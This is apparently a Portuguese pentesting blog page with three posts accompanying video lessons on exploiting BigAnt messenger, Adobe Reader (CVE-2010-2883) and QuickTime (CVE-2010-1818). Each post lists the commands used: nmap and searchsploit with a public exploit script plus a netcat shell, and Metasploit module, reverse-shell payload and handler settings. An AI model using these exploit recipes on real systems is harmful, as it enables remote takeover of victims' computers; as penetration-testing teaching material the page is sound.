banner468

Mostrando postagens com marcador 0day. Mostrar todas as postagens
Mostrando postagens com marcador 0day. Mostrar todas as postagens

sábado, 21 de maio de 2011

Explorando falha no BigAnt


O BigAnt é um software voltado para o uso em empresas, pois ele basicamente é um mensageiro instantâneo no qual o administrador da rede cria um servidor, cria todas as contas que poderão acessá-lo, definindo suas permissões de acesso e senhas, e integra a comunicação dos seus funcionários, não importando o tamanho da sua empresa. Além disso, todas as mensagens trocadas são criptografadas, ou seja, não haverá perigo de alguém roubar informações confidenciais através de uma conversa entre gerentes, por exemplo.

Ao baixar o BigAnt existirão dois arquivos, um é o mensageiro em si e o outro é o console, ou seja, o servidor pelo qual o administrador controlará o andamento das coisas. Instale ambos. A primeira coisa a ser feita é rodar o console e criar um servidor, grupos e usuários. Ao executar o console clique em “demo” para assistir a um vídeo demonstrando o funcionamento básico dele.

Usuários

Depois repasse o IP e nome de usuário e senha para aqueles que venham a utilizar o seu servidor. Por fim, basta inserir esses dados no “messenger” e usá-lo como se fosse o Windows Live Messenger, pois ambos funcionam de maneira muito similar.

Agora que sabemos... vamos a arte da exploração. :)

Ferramentas usadas: 

Comandos:
nmap -p 1-9999 192.168.1.102
cd /pentest/exploits/exploit-db
./searchsploit bigant
cp platforms/windows/remote/10765.py /root/
cd /root/
python 10765.py 192.168.1.102
nc 192.168.1.102 4444

Sobre a aula:
Tamanho: 34 Mb
Formato: AVI
Duração: 3:14
Musica: The Marcels - Blue Moon


quinta-feira, 16 de setembro de 2010

Vulnerabilidade no Adobe Reader 9.3.4(0day)


Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores. Mas uma vez o Metasploit na frente de seus concorrentes... :P

Comandos:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler

Sobre o Vídeo: 
Formato:  AVI
Tamanho:  18.8 MB
Duração: 5:59 min
Musica:  Carl Orff - Carmina Burana - O Fortuna

Ref:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html

domingo, 12 de setembro de 2010

Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)


Nessa aula mostro como explorar a vulnerabilidade no QuickTime, essa vulnerabilidade e classificada de 0day e afeta todas as versões do QuickTime e do Windows. Ela foi descoberta pelo Investigador de segurança Ruben Santamarta.

Comandos:
use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST SeuIP
set SRVPORT 80
set URIPATH /
set payload windows/shell/reverse_tcp
set LHOST SeuIP
set LPORT 5050
exploit

Sobre o Vídeo:
Formato:  AVI
Tamanho: 8.2 MB
Duração: 3:57 min
Musica: Mantenha o Respeito - Marcelo D2 
Baixar: http://www.4shared.com/file/eKgQCHTr/0day-quicktime.html




Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1818
http://www.osvdb.org/67705
http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers